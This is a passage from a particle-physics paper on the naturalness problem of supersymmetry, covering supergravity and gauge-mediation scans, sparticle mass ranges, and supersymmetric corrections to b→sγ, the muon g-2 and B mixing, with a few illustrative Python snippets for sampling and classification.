An alternative scanning procedure that does not restrict at all the parameter space
$$m_0,|\mu_0|,M_5,B_0,|A_0|=(0\div 1)m_{\rm SUSY}.$$
gives the same final results as in~(\ref{sys:range}).
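The sampling of the ranges~(\ref{sys:range}) can be sketched as follows (a hypothetical helper, not the code actually used for the scans):

```python
import math
import random

def sample_ratios(rng=random):
    """Draw one set of dimensionless ratios: flat in log scale for
    m0, |mu0| and M5 (in units of mSUSY), flat in linear scale for
    A0 and B0 (in units of m0).  Illustrative helper only."""
    def log_uniform(lo, hi):
        # flat density in logarithmic scale on [lo, hi]
        return math.exp(rng.uniform(math.log(lo), math.log(hi)))
    m0 = log_uniform(1.0 / 9.0, 3.0)
    mu0 = log_uniform(1.0 / 3.0, 3.0)
    M5 = log_uniform(1.0 / 3.0, 3.0)
    A0 = rng.uniform(-3.0, 3.0) * m0
    B0 = rng.uniform(-3.0, 3.0) * m0
    return m0, mu0, M5, A0, B0
```

The log-flat choice makes each decade of a ratio equally likely, so neither the small nor the large end of a range dominates the scan.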
\smallskip
We now exhibit the results of this analysis in a series of figures.
In fig.s~\ref{fig:MassePallini} we show some scatter plots
with sampling density proportional to the naturalness probability.
The sampling points that give spectra excluded at LEP1 are drawn in black,
the points excluded at LEP2 in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}{},
and the still allowed points are drawn in \Green light gray\special{color cmyk 0 0 0 1.}{}.
The present bounds are listed in appendix~A.
The pre-LEP2 bounds approximately consist in requiring that
all charged and coloured particles be heavier than $M_Z/2$.
Fig.~\ref{fig:MassePallini}a shows the correlation between the masses of the
lightest chargino, $m_\chi$,
and of the lightest higgs, $m_h$.
This plot shows that the experimental bounds on $m_\chi$ and $m_h$
are the only important ones in minimal supergravity
(if $m_0\ll M_5$ also the bound on the mass of right-handed sleptons becomes relevant).
The bound on the chargino mass is more important than the one on the higgs mass:
even omitting the bound on the higgs mass
the number of allowed points would not be significantly increased
(the MSSM predicts a light higgs;
but this prediction can be relaxed by the addition of a singlet field to the MSSM spectrum).
The experimental bounds on supersymmetry are thus very significant
(to appreciate this fact one must notice that the allowed points have small density).
This fact is perhaps illustrated more explicitly in
fig.~\ref{fig:MassePallini}b, where we show the correlation
between the masses of the lightest chargino, $M_\chi$,
and of the lightest neutralino, $M_N$.
We see that in the few points where LEP2 bound on the chargino mass is satisfied,
the two masses $M_N\approx M_1$ and $M_\chi\approx M_2$
are strongly correlated
because the $\mu$ parameter is so large that the
$\SU(2)_L$-breaking terms in the gaugino mass matrices become irrelevant.
We clearly appreciate how strong has been the improvement done at LEP2.
In fig.~\ref{fig:MassePallini}c we show an analogous plot in the
$(M_3,m_{\tilde{q}})$ plane, often used to show bounds from hadronic accelerators.
The bounds from LEP2 experiments, together with the assumption of mass universality at the unification scale,
give constraints on the masses of coloured particles stronger than the direct bounds from Tevatron experiments.
In fig.s~\ref{fig:MasseCampane} we show the same kind of results using a different
format.
We show the `naturalness distribution probability' for the masses of various representative
supersymmetric particles and for $\tan\beta$.
The allowed points have been drawn in \Green dark gray\special{color cmyk 0 0 0 1.};
those excluded at LEP2 (LEP1)
in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}{} (in \Orange light gray\special{color cmyk 0 0 0 1.}).
As a consequence of the naturalness problem the allowed spectrum is confined in fig.s~\ref{fig:MasseCampane} to
the small tails in the upper part of the unconstrained probability distributions.
The fact that LEP1 experiments did not find a chargino lighter than $M_Z/2$
excluded about $70\%$ of the unified supergravity parameter space.
In the MSSM with soft terms mediated by `minimal supergravity'
the present experimental bounds exclude $95\%$
of the parameter space with broken electroweak symmetry
($97\%$ if we had neglected one-loop corrections to the potential).
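The exclusion percentages quoted above follow from simple counting over the sampled spectra. A minimal sketch of that bookkeeping, where the toy log-uniform chargino mass distribution is our own illustrative assumption and not the multi-parameter scan actually performed in the text:

```python
import math
import random

def excluded_fraction(draw_mass, bound, n=100_000, seed=1):
    """Fraction of sampled spectra whose mass falls below a lower
    experimental bound (in GeV).  Purely illustrative bookkeeping:
    the scan in the text samples full soft-term spectra, not a
    single toy mass."""
    rng = random.Random(seed)
    n_excluded = sum(1 for _ in range(n) if draw_mass(rng) < bound)
    return n_excluded / n

def toy_chargino_mass(rng):
    # Assumed toy distribution: log-uniform between 20 and 500 GeV.
    return math.exp(rng.uniform(math.log(20.0), math.log(500.0)))

frac_lep1 = excluded_fraction(toy_chargino_mass, 45.6)  # roughly M_Z/2
frac_lep2 = excluded_fraction(toy_chargino_mass, 90.0)  # LEP2-like bound
```

With any fixed seed the LEP2-like bound necessarily excludes a larger fraction than the LEP1-like one, mirroring the $70\%\to95\%$ progression in the text.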
\subsection{Non minimal supergravity}
Some of the assumptions of the `minimal supergravity scenario' allow one to reduce the number of parameters,
but do not have a solid theoretical justification.
`Minimal supergravity' at the Planck (or string) scale can be justified; but even in this case
the mass spectrum at the unification scale
is expected to be significantly different
from the minimal one due to renormalization effects~\cite{RGEGUT}.
If the theory above the gauge unification scale is a unified theory,
these renormalization effects induce new flavour and CP violating processes~\cite{HKR,FVGUT},
that we will discuss in section~\ref{sflavour}.
In this section we study the naturalness problem in
`unified supergravity', that we consider an interesting and predictive scenario.
More precisely, beyond performing the scanning~(\ref{sys:range}), we also
allow the higgs mass parameters at the unification scale to vary in the range
$$m_{h^{\rm u}},m_{h^{\rm d}}=(\frac{1}{3}\div 3) m_0$$
where $m_0$ is now the mass of the sfermions contained in the $10_3=((t_L,b_L),t_R,\tau_R)$ multiplet of SU(5).
We can assume that all remaining sfermions have the same mass $m_{0}$, since
they do not play any significant role in the determination of $M_Z^2$
(unless they are very heavy; we do not consider this case in this section).
From the point of view of the naturalness problem there is no
significant difference between minimal and unified supergravity:
an unnatural cancellation remains necessary even if there are more parameters.
From the point of view of phenomenology, maybe the most interesting
new possibility is that a mainly right handed stop
can `accidentally' become significantly lighter than the other squarks.
Unless the top $A$-term is very large, this accidental cancellation is possible only if~\cite{lightStop}
$$m_{10_3}^2/m_{h_{\rm u}}^2\approx (0.6\div0.8)\qquad\hbox{and}\qquad M_2\circa{<}0.2|m_{h_{\rm u}}|$$
(all parameters renormalized at $M_{\rm GUT}$) ---
a region of the parameter space where the small mass $M_2$ term for the chargino
makes the naturalness problem stronger.
The large Yukawa coupling of a light stop can generate various interesting loop effects
($b\to s\gamma$, $\Delta m_B$, $\varepsilon_K$)
and make the electroweak phase transition sufficiently first-order
so that a complex $\mu$ term can induce baryogenesis~\cite{EWbaryogenesis}.
However this possibility is severely limited by naturalness considerations~\cite{lightStop}:
it requires not only that one numerical accident makes the $Z$ boson
sufficiently lighter than the unobserved chargino,
but also that a second independent numerical accident gives a stop lighter than the other squarks.
The fact that in our analysis this combination occurs very rarely ($p\sim10^{-3}$)
means that this nice possibility is very unnatural.
Furthermore a stop lighter than $200\,{\rm GeV}$ is strongly correlated with
a too large supersymmetric correction to the $\mathop{\rm BR}(B\to X_s \gamma)$ decay.
\smallskip
In fig.~\ref{fig:MultiCampana} we show the naturalness distribution of sparticle masses
omitting all the experimentally excluded spectra, i.e.\ under the assumption
that supersymmetry has escaped detection because a numerical
accident makes the sparticles too heavy for LEP2.
In the more realistic `unified supergravity' scenario,
these distributions correspond to the `allowed tails'
of the full distributions plotted in fig.s~\ref{fig:MasseCampane}.
Since the allowed spectra come from a small region of the parameter space,
their naturalness distribution probability has a less significant
dependence on the choice of the scanning procedure.
It is possible to define the most likely range of values of the masses of
the various sparticles, for example by excluding the first $10\%$ and the last $10\%$
of the various distributions.
These $(10\div 90)\%$ mass ranges are shown in table~\ref{tab:campane}.
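A minimal sketch of how such a central $(10\div90)\%$ range can be read off from a sample; for simplicity it ignores the naturalness weights that the actual distributions carry, and the toy gluino masses are made-up numbers:

```python
def central_range(values, lo_frac=0.10, hi_frac=0.90):
    """Central (10-90)% range: drop the first and the last 10% of a
    sorted sample.  Illustrative only; the distributions in the text
    are naturalness-weighted, which a real extraction must include."""
    s = sorted(values)
    n = len(s)
    return s[int(lo_frac * n)], s[int(hi_frac * n) - 1]

# Toy sample of gluino masses in GeV (made-up numbers).
masses = [300, 450, 500, 700, 900, 1100, 1300, 1500, 1800, 2500]
lo, hi = central_range(masses)
```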
We see that, once one accepts the presence of a numerical accident,
it is not extremely unlikely that it is so strong that coloured particles are heavier than a few TeV
(even for such heavy sparticles, a stable neutralino is not necessarily dangerous for cosmology).
Nevertheless there is still a very good probability that supersymmetry can be detected at LHC.
In section~\ref{effects} we will use these naturalness probability distributions for
sparticle masses to compute the natural values of various interesting loop effects mediated by
the sparticles, that could be discovered before LHC.
\medskip
\begin{figure*}[t]
\begin{center}
\begin{picture}(17.5,4)
\putps(0,0)(0,0){MultiCampane}{fMultiCampane.ps}
\end{picture}
\caption[SP]{\em Naturalness distribution of some illustrative supersymmetric
particle masses (on the horizontal axis) in unified supergravity,
under the hypothesis that supersymmetry has not been found at LEP2 due
to a numerical accident.
The three {\special{color cmyk 1. 1. 0.3 0} continuous lines\special{color cmyk 0 0 0 1.}} are the three gauginos
($M_N$, $M_\chi$ and $M_{\tilde{g}}$ from left to right).
The {\Cyan thin dashed line\special{color cmyk 0 0 0 1.}} is the lightest slepton and
the {\special{color cmyk 0 1. 1. 0.5} thick dashed lines\special{color cmyk 0 0 0 1.}} are the lightest stop (left) and squark (right).
The {\Purple dotted lines\special{color cmyk 0 0 0 1.}} are the light and charged higgs.
The distribution of $\tan\beta$ is not shown because similar to the one in fig.~\ref{fig:MasseCampane}.
\label{fig:MultiCampana}}
\end{center}\end{figure*}
Before concluding this section, we recall that the bounds on the gluino
mass from Tevatron experiments are not competitive with the LEP2 bounds on the chargino mass,
if gaugino mass universality is assumed.
Consequently it is possible to alleviate the naturalness problem of supersymmetry
by abandoning gaugino mass universality
and making the gluino pole mass as light as possible, $M_3\sim (200\div250)\,{\rm GeV}$
(in supergravity this requires a small gluino mass, $M_3(M_{\rm GUT})\sim100\,{\rm GeV}$, at the unification scale;
an analogous possibility in gauge-mediation requires a non unified spectrum of messengers).
In this case the sparticle spectrum is very different from the one typical of all conventional models;
consequently the loop effects mediated by coloured sparticles are larger.
Even if in this case the minimal FT can be reduced down to ${\cal O}(1)$ values,
we do not find this solution completely satisfactory.
If we treat all the gaugino and sfermion masses as free parameters of order $M_Z$,
the SM $Z$ boson mass is still one (combination) of them, and there is still no reason,
other than an unwelcome accident,
why $M_Z$ is roughly the smallest of all the $\sim10$ charged and coloured soft masses.
In any case, Tevatron can concretely explore this possibility in the coming years.
\begin{table}[b]
\begin{center}
$$\begin{array}{|c|c|}\hline
\chbox{supersymmetric}&\chbox{mass range}\\
\chbox{particle}&\chbox{(in GeV)}\\ \hline
\hbox{lightest neutralino} & ~55 \div 250\\
\hbox{lightest chargino} & ~110 \div 500\\
\hbox{gluino} & ~400\div1700\\
\hbox{slepton} & ~105\div 600\\
\hbox{squark} & ~400\div 1700\\
\hbox{stop} & ~250 \div 1200\\
\hbox{charged higgs} &~300\div 1200\\ \hline
\end{array}$$
\caption[SP]{\em $(10\div90)\%$ naturalness
ranges for the masses of various supersymmetric particles,
in unified supergravity,
assuming that the naturalness problem is caused by an accidental cancellation.
\label{tab:campane}}
\end{center}\end{table}
\begin{figure*}[t]
\begin{center}
\begin{picture}(15,7)
\putps(0,0)(0,0){GMFTneg}{fGMFTneg.ps}
\putps(8,0)(8,0){GMFTpos}{fGMFTpos.ps}
\put(2,-0.3){Messenger mass $M_{\rm GM}$}
\put(10,-0.3){Messenger mass $M_{\rm GM}$}
\put(-0.5,3.8){$\eta$}
\put(7.5,3.8){$\eta$}
\put(3.3,7){$\mu<0$}
\put(11.5,7){$\mu>0$}
\end{picture}
\vspace{5mm}
\caption[SP]{\em Contour plot of the fine-tuning parameter $\Delta$ in gauge mediation models
in the plane $(M_{\rm GM},\eta)$ for $\mu<0$ (left)
and $\mu>0$ (right).
In the (\special{color cmyk 0 1. 1. 0.5} dark gray\special{color cmyk 0 0 0 1.}, white, \Green light gray\special{color cmyk 0 0 0 1.}) area at the (left, center, right)
of each picture the strongest experimental constraint is the one on the mass of the lightest
(neutralino, right handed slepton, chargino).
Values of $\eta$ in the gray area below the lower dashed lines and above the upper dashed lines
are not allowed in models with only one SUSY-breaking singlet.
\label{fig:GMFT}}
\end{center}\end{figure*}
\subsection{Gauge mediation}
`Gauge mediation' models contain some charged `messenger' superfields
with some unknown mass $M_{\rm GM}=(10^5\div10^{15})\,{\rm GeV}$
directly coupled to a gauge singlet field with supersymmetry-breaking vacuum expectation value.
The `messengers' mediate supersymmetry-breaking terms to the MSSM
sparticles that feel gauge interactions~\cite{GaugeSoft,Review}.
The spectrum of the supersymmetric particles
is thus mainly determined by their gauge charges.
More precisely, in a large class of minimal models
(from the first toy ones to the more elaborated recent ones)
the prediction for the soft terms, renormalized at the messenger mass $M_{\rm GM}$, can be
conveniently parametrized as
\begin{eqnsystem}{sys:GM}
M_i(M_{\rm GM})&=& \frac{\alpha_i(M_{\rm GM})}{4\pi} M_0,\\
m_R^2(M_{\rm GM}) &=& \eta\cdot c^i_R M_i^2(M_{\rm GM}),
\end{eqnsystem}
where
$m_R$ are the soft mass terms for the fields
$$R=\tilde{Q},\tilde{u}_R,\tilde{d}_R,\tilde{e}_R,
\tilde{L},h^{\rm u},h^{\rm d},$$
and the various quadratic Casimir coefficients $c^i_R$ are listed, for example, in ref.~\cite{GMFT}.
Here $M_0$ is an overall mass scale and $\eta$
parametrizes the different minimal models.
For example $\eta=(n_5+3n_{10})^{-1/2}\le 1$ in models
where a single gauge singlet couples supersymmetry breaking
to $n_5$ copies of messenger fields in the $5\oplus\bar5$
representation of SU(5)
and to $n_{10}$ copies in the $10\oplus\overline{10}$
representation~\cite{GaugeSoft,Review}.
Values of $\eta$ bigger than one are possible
if more than one supersymmetry-breaking singlet is present~\cite{GaugeSoft,Review}.
If the messengers are as light as possible the sparticle spectrum becomes somewhat different
from the one in~(\ref{sys:GM})
(but we will argue in the following that this case is very unnatural).
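The parametrization~(\ref{sys:GM}) and the single-singlet relation $\eta=(n_5+3n_{10})^{-1/2}$ can be sketched numerically; the gauge couplings and quadratic Casimir values below are placeholders for illustration, not numbers taken from this paper:

```python
import math

def eta_single_singlet(n5, n10):
    """eta = (n5 + 3*n10)**(-1/2) for a single SUSY-breaking singlet
    coupled to n5 messengers in 5+5bar and n10 in 10+10bar of SU(5)."""
    return (n5 + 3 * n10) ** -0.5

def gauge_mediated_soft_terms(alphas, M0, eta, casimirs):
    """Soft terms at the messenger scale as parametrized in (sys:GM).

    alphas:   {i: alpha_i(M_GM)}, gauge couplings at the messenger mass
    casimirs: {i: c_i}, quadratic Casimirs of the field R (model inputs)
    Returns the gaugino masses M_i and the scalar soft mass m_R."""
    M = {i: a / (4 * math.pi) * M0 for i, a in alphas.items()}
    m2 = eta * sum(c * M[i] ** 2 for i, c in casimirs.items())
    return M, math.sqrt(m2)

# Placeholder inputs, not values from the paper:
alphas = {1: 0.017, 2: 0.033, 3: 0.09}   # alpha_i(M_GM)
casimirs = {2: 1.5, 3: 2.67}             # a squark-like field R
M, mR = gauge_mediated_soft_terms(alphas, 1e5, eta_single_singlet(1, 0), casimirs)
```

The sketch makes the hierarchy explicit: gaugino masses track the gauge couplings, so the coloured states are the heaviest, and a right-handed slepton (small Casimirs) comes out much lighter, which is the origin of the naturalness problem discussed below.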
Gauge-mediation models have the problem that
gauge interactions alone cannot mediate
the `$\mu$-term',
as well as the corresponding `$B\cdot \mu$-term',
since these terms break a Peccei-Quinn symmetry.
The unknown physics
required to solve this problem
may easily give rise to unknown non minimal
contributions to the soft terms in the Higgs sector~\cite{Review},
but this lack of predictivity does not prevent the study of naturalness.
Like in supergravity models, the one loop corrections to the potential are very important.
In gauge mediation models the minimal fine tuning is higher than
in supergravity models~\cite{GMFT,Rom}
because gauge mediation generates a right handed
selectron mass significantly smaller than the higgs mass term which sets the scale of electroweak symmetry breaking.
This effect is more pronounced for intermediate values of the mediation scale, $M_{\rm GM}\sim 10^{8}\,{\rm GeV}$.
Higher values of the mediation scale give spectra of sparticles more similar to supergravity case,
that have a less strong naturalness problem
(but if $M_{\rm GM}\circa{>}10^{12}\,{\rm GeV}$ it is necessary to complicate the theory
to avoid destruction of nucleosynthesis~\cite{Review}).
If the mediation scale is as light as possible the RGE effects between $M_{\rm GM}$ and $M_Z$ are smaller,
reducing the fine-tuning.
However for low values of the messenger mass, $M_{\rm GM}\circa{<}10^{7\div 8}\,{\rm GeV}$,
the neutralino decays within the detector, so that LEP2 experiments give now
a {\em very strong\/} bound on its mass: $m_N>91\,{\rm GeV}$
(if $\eta\circa{<}0.5$ the experimental bounds can be less stringent because
a slepton could be lighter than the neutralinos).
The consequent strong naturalness problem makes the light messenger scenario unattractive.
Values of the gauge mediation scale higher than $M_{\rm GM}\circa{>}10^9\,{\rm GeV}$ are instead less attractive
from the point of view of cosmology~\cite{OmegaGravitino}.
In fig.~\ref{fig:GMFT} we show contour plots of the fine tuning required by gauge mediation models,
in the plane ($M_{\rm GM},\eta$) for $\tan\beta=2.5$ and $M_t^{\rm pole}=175\,{\rm GeV}$
(this corresponds to $\lambda_t(M_{\rm GUT})\approx 0.5$, taking into account
threshold corrections to $\lambda_t$;
the FT is somewhat higher if one uses larger allowed values of $\lambda_t(M_{\rm GUT})$),
where $M_{\rm GM}$ is the messenger mass, while $\eta$
parametrizes the different models, as defined in~(\ref{sys:GM}).
The fine tuning is computed according to the definition in~\cite{GMFT}, including
one loop effects and all recent bounds.
In these figures we have shaded in \Green medium gray\special{color cmyk 0 0 0 1.}{} the regions at high values of the messenger mass
where the bound on the chargino mass is the strongest one and the fine-tuning is not higher than
in supergravity models.
We have shaded in \special{color cmyk 0 1. 1. 0.5} dark gray\special{color cmyk 0 0 0 1.}{} the regions at small values of the messenger mass
where the very strong new bound on the neutralino mass makes the model unattractive.
We have not coloured the remaining region where
the bound on the right handed slepton masses is the strongest one and makes
the fine tuning higher than in supergravity models.
Small ($\eta\circa{<}0.4$) and big ($\eta>1$) values of $\eta$ (below and above the dashed lines)
are only allowed in models
where more than one singlet field couples supersymmetry breaking to the messenger fields.
The fine tuning strongly increases for smaller values of $\tan\beta$,
and becomes a bit lower for higher values of $\tan\beta$.
The choice of parameters used in the example shown in fig.~\ref{fig:example}
corresponds to one of the most natural cases.
As indicated by fig.~\ref{fig:GMFT}, extremely light messengers ($M_{\rm GM}\approx 10\,{\rm TeV}$)
could give rise to a more natural sparticle spectrum
(with detectably non-unified gaugino masses~\cite{GMNLOlowM});
we have not studied this possibility because NLO corrections~\cite{GMNLOlowM,GMNLO},
that depend on unknown couplings between messengers, become relevant in this limiting case.
\begin{figure*}
\begin{center}
\begin{picture}(17.5,5)
\putps(0,0)(-0.5,0){bsg}{fbsg.ps}
\put(3.2,5.5){$\ref{fig:bsg}a$}
\put(9,5.5){$\ref{fig:bsg}b$}
\put(14.8,5.5){$\ref{fig:bsg}c$}
\end{picture}
\caption[SP]{\em Naturalness distribution of three possibly interesting `minimal' supersymmetric effects
($\mathop{\rm BR}(B\to X_s\gamma)_{\rm MSSM}/\mathop{\rm BR}(B\to X_s\gamma)_{\rm SM}$ in fig.~\ref{fig:bsg}a,
anomalous magnetic moment of the muon $a_\mu$ in fig.~\ref{fig:bsg}b
and $\Delta m_B^{\rm SUSY}/\Delta m_B$ in fig.~\ref{fig:bsg}c)
in unified supergravity with degenerate sfermions. We have plotted
in {\Purple light gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where at least one of these loop effects is too large,
in {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} the ones where at least one of these loop effects is detectable,
and in black the ones where all effects seem too small.
Our boundaries between excluded/detectable/too small effects are represented by the
horizontal lines.
\label{fig:bsg}}
\end{center}\end{figure*}
\section{Supersymmetric loop effects}\label{effects}
Assuming that the supersymmetric naturalness problem is caused by a numerical accident,
we now study the natural values of various supersymmetric loop effects,
hopefully detectable in experiments at energies below the supersymmetric scale.
As discussed before, since the allowed parameter space is very small,
we can safely compute naturalness distributions in any given model.
As before we concentrate our analysis on unified supergravity
and, for simplicity, we assume that the sfermions of each given generation have
a common soft mass and a common $A$ term at the unification scale.
In a first subsection we assume complete degeneracy of all the sfermions at the unification scale.
In this case the CKM matrix is the only source of flavour and CP violation
(possible complex phases in the supersymmetric parameters --- not discussed here ---
would manifest at low energy mainly as electric dipoles).
The supersymmetric corrections to loop effects already present in the SM are studied in
this first subsection.
In the second subsection we will assume
(as suggested by unification of gauge couplings and by the heaviness of the top quark~\cite{HKR,FVGUT})
that the sfermions of third generation are non degenerate with the other ones.
In this case the MSSM Lagrangian contains new terms that violate leptonic flavour, hadronic flavour and CP
and that can manifest in a variety of ways.
These effects depend in a significant way not only on the masses of the sparticles,
but also on unknown parameters not constrained by naturalness.
We will thus compute them only in particular motivated models.
\subsection{Minimal effects}\label{MinimalEffects}
In cases where electroweak loop corrections give observable effects to some measurable quantities,
supersymmetry can give additional loop corrections comparable to the SM ones.
None of these corrections have been seen in the electroweak precision measurements done mostly at LEP.
However more powerful tests of this kind will be provided by more precise measurement and
more precise SM predictions of some `rare' processes in
$B$ physics ($b\to s\gamma$, $b\to s\ell^+\ell^-$, $\Delta m_B$),
$K$ physics ($\varepsilon_K$, $K\to \pi\nu\bar{\nu}$)
and of the anomalous magnetic moment of the muon, $a_\mu\equiv(g-2)_\mu/2$\footnote{We have carefully computed
the supersymmetric corrections to $b\to s\gamma$
(assuming an experimental cutoff $E_\gamma > 70\% E_\gamma^{\rm max}$ on the photon energy)
including all relevant NLO QCD corrections in this way:
The SM value have been computed as in~\cite{KN}.
The charged Higgs contribution is computed including only the relevant NLO terms as in the first reference in~\cite{C7HNLO}
(the other two references in~\cite{C7HNLO} include all the remaining terms requested by a formal NLO expansion,
that at most affect $\mathop{\rm BR}(B\to X_s\gamma)$ at the $1\%$ level).
The NLO corrections to the chargino/stop contribution are taken from~\cite{CchiNLO},
again omitting the negligible NLO corrections to the $b\to sg$ chromo-magnetic penguin.
Unfortunately the approximation used in~\cite{CchiNLO} is not
entirely satisfactory: the chargino/squark corrections to the $b\to s\gamma$ rate
can be large even without a lighter stop with small mixing,
as assumed in~\cite{CchiNLO} to simplify the very complex computation.
Finally, we have included the threshold part of the two-loop ${\cal O}(\lambda_t^2)$ corrections
that does not decouple in the limit of heavy supersymmetric particles.
We have computed $a_\mu$ using the formul\ae{} given in~\cite{gMuSUSY}.
The supersymmetric correction to $\Delta m_B$ have been taken from~\cite{BBMR}.}.
Notwithstanding the stringent constraints on the sparticle masses,
in some particular region of the unified supergravity parameter space,
{\em all\/} these supersymmetric corrections can still be significant~\cite{okada}.
We study the naturalness of the regions where the effects are maximal.
In fig.~\ref{fig:bsg} we show the naturalness distribution probabilities for these effects.
We have drawn
in {\Purple light gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where one (or more) supersymmetric loop effect is too large;
in {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where one (or more) effect is detectable in planned experiments,
and in black the contributions from spectra for which all effects are too small.
Requiring a $\sim95\%$ confidence level for considering an effect excluded or discovered,
we divide the possible supersymmetric effects into `excluded', `discoverable', or `too small'
according to the following criteria.
We consider allowed a value of
$R=\mathop{\rm BR}(B\to X_s\gamma)_{\rm MSSM}/\mathop{\rm BR}(B\to X_s\gamma)_{\rm SM}$
(where the MSSM value includes SM and sparticle contributions)
in the range $0.6<R<1.5$, and we consider discoverable a correction to $R$ larger than $20\%$.
The present experimental uncertainty on $10^{10} a_\mu$ is $\pm 84$~\cite{pdg} and
will be reduced maybe even below the $\pm4$ level~\cite{brook}.
It seems possible to reduce the present QCD uncertainty in the SM prediction to the same level~\cite{QCDg-2}.
In our plot we consider detectable a supersymmetric correction to $a_\mu$ larger than $10^{-9}$.
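The classification criteria above can be collected in a small sketch; the thresholds are exactly those quoted in the text, everything else (function names, structure) is illustrative:

```python
def classify_bsg(R):
    """R = BR(B -> Xs gamma)_MSSM / BR(B -> Xs gamma)_SM.
    Criteria quoted in the text: allowed if 0.6 < R < 1.5,
    discoverable if the correction |R - 1| exceeds 20%."""
    if not 0.6 < R < 1.5:
        return "excluded"
    if abs(R - 1.0) > 0.20:
        return "discoverable"
    return "too small"

def classify_amu(delta_amu, threshold=1e-9):
    """Supersymmetric correction to a_mu: detectable above 1e-9."""
    return "discoverable" if abs(delta_amu) > threshold else "too small"
```

Applying these two functions to every sampled spectrum reproduces the three-way light gray/medium gray/black splitting of the distributions in fig.~\ref{fig:bsg}.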
It is easy to imagine how fig.~\ref{fig:bsg} would change with more or less prudent estimates.
\smallskip
The results are the following.
Fig.~\ref{fig:bsg} shows that {\em $b\to s\gamma$ is a very promising candidate for a discoverable effect\/}.
More precisely supersymmetry gives a correction to $\mathop{\rm BR}(B\to X_s\gamma)$ larger than $20\%$
in about $40\%$ of the allowed sampling spectra.
A supersymmetric correction to the $b\to s\gamma$ magnetic penguin also manifests
as a distortion of the spectrum of the leptons in the decay $b\to s\ell^+\ell^-$.
{\em A detectable supersymmetric effect in the $g-2$ of the muon is less likely but not impossible}.
About $10\%$ of the sampled spectra are accompanied by a discoverably large effect in $g-2$
without a too large correction to $b\to s\gamma$.
On the contrary a detectable (i.e.\ $\circa{>}30\%$) supersymmetric correction to $B$ mixing
(shown in fig.~\ref{fig:bsg}c) and to $K$ mixing
(not shown because linearly correlated to the effect in $B$ mixing)
can only be obtained for values of the parameters~\cite{okada} strongly
disfavoured by our naturalness considerations.
The same conclusion holds for $K\to\pi\nu\bar{\nu}$ decays.
An enhancement of the effects is possible in two particular situations:
if $\tan\beta$ is large, or if a stop state is lighter than $\sim200\,{\rm GeV}$.
Both these situations can be realized --- but only for
particular values of the parameters --- in the `unified supergravity' scenario
in which we are doing our computations.
As discussed in the previous section, such a light stop is decidedly not a natural expectation.
The possibility of a large $\tan\beta$ is instead a weak aspect of our analysis.
If the scalar masses are larger than all the other soft terms ($A$, $B$, $\mu$ and gaugino masses)
a large $\tan\beta$ is naturally obtained~\cite{largetanBeta}.
In our scanning of the parameter space we have preferred to assume that the $A$ terms are of the same order
of the scalar masses, and we have thus not covered this possibility.
We do not explore the possibility of large $\tan\beta$ in this article
because
a large $\tan\beta$ would enhance the one loop effects that are already
more ($b\to s\gamma$) or less ($a_\mu$) promising,
but not the effects that seem uninteresting.
\begin{figure*}[t]
\begin{center}
\begin{picture}(18,5)
\putps(0,0)(0,0){fitSiEps}{fitSiEps.ps}
\putps(6,0)(6,0){fitNoEps}{fitNoEps.ps}
\putps(12,0)(12,0){fitCompat}{fitCompat.ps}
\put(2.5,5.5){$\ref{fig:fit}a$}
\put(8.75,5.5){$\ref{fig:fit}b$}
\put(15,5.5){$\ref{fig:fit}c$}
\end{picture}
\caption[SP]{\em
In fig.s~\ref{fig:fit}a,b we show the `best fit' values of the plane ($\rho,\eta$).
In fig.~\ref{fig:fit}a we include all data in the fit, while in
fig.~\ref{fig:fit}b we omit $\varepsilon_K$.
In fig.~\ref{fig:fit}c we include all data except $\varepsilon_K$,
and we study the
compatibility between theory and experiments of each given value of $\rho$ and $\eta$.
In all cases the contour levels correspond to $68\%$, $95\%$ and $99\%$ C.L.
\label{fig:fit}}
\end{center}\end{figure*}
\begin{figure*}[t]
\begin{center}
\begin{picture}(15.5,7)
\putps(0,0)(-4,0){LHFV}{fLHFV.ps}
\end{picture}
\caption[SP]{\em
Naturalness distribution of various possibly interesting `non minimal' supersymmetric effects
(in the upper row, from left to right: $\mathop{\rm BR}(\mu\to e\gamma)$, $|d_e|/(e\cdot{\rm cm})$,
$|\varphi_{B_d}^{\rm SUSY}|\equiv
|\arg(\Delta m_{B_d}/\Delta m_{B_d}^{\rm SM})|$,
direct CP asymmetry in $b\to s\gamma$;
in the lower row:
supersymmetric correction to the CP asymmetry in the $B_d\to \phi K_S$ decay,
to $d_N/(e\cdot{\rm cm})$, to $\varepsilon_K$, to the mixing induced CP asymmetry in $b\to s\gamma$)
in unified supergravity with $\eta_f=0.5$
(all assumptions are listed in the text).
The vertical axes contain the values of the loop effects.
The {\Purple light gray\special{color cmyk 0 0 0 1.}} part of the distributions comes from spectra where one
of the loop effects is too large,
the {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} part from spectra accompanied by a discoverable effect;
the black part from spectra where all the loop effects are too small.
The horizontal {\special{color cmyk 0 1. 1. 0.5} dashed lines\special{color cmyk 0 0 0 1.}} in each plot delimit
the smallest effect that we estimate detectable
(the continuous lines delimit already excluded effects).
\label{fig:LHFV}}
\end{center}
\end{figure*}
\setcounter{footnote}{0}
\subsection{New supersymmetric effects}\label{sflavour}
The mass matrices of the sfermions can contain new sources of
flavour and CP violation, both in the hadronic and in the leptonic sector, that
manifest themselves in processes either absent (like $\mu\to e\gamma$) or extremely small
(like the electron and neutron electric dipoles) in the SM.
This possibility is often discussed (see e.g.~\cite{masiero})
in the `mass insertion' approximation~\cite{HKR}, where
the sfermion mass matrices are proportional to the unit matrix,
plus small (and unknown) off diagonal terms.
There is however no phenomenological constraint that forces
the sfermions of third generation to be degenerate with the corresponding ones of the first two generations.
Indeed, even with a maximal 12/3 splitting,
fermion/sfermion mixing angles $V_{f\tilde{f}}$ as large as the CKM ones do not necessarily produce too large effects.
Thus we will allow the masses of sfermions of third generation,
$m_{3\tilde{f}}$, to be different from the other ones,
and parametrize this 12/3 non degeneration introducing a parameter $\eta_f$:
\begin{equation}\label{eq:eta}
m^2_{1\tilde{f}}=m^2_{2\tilde{f}}=m^2_{3\tilde{f}}/\eta_f\qquad
\hbox{at the unification scale.}
\end{equation}
Rather than present a general parametrization,
we now prefer to restrict our analysis to the case
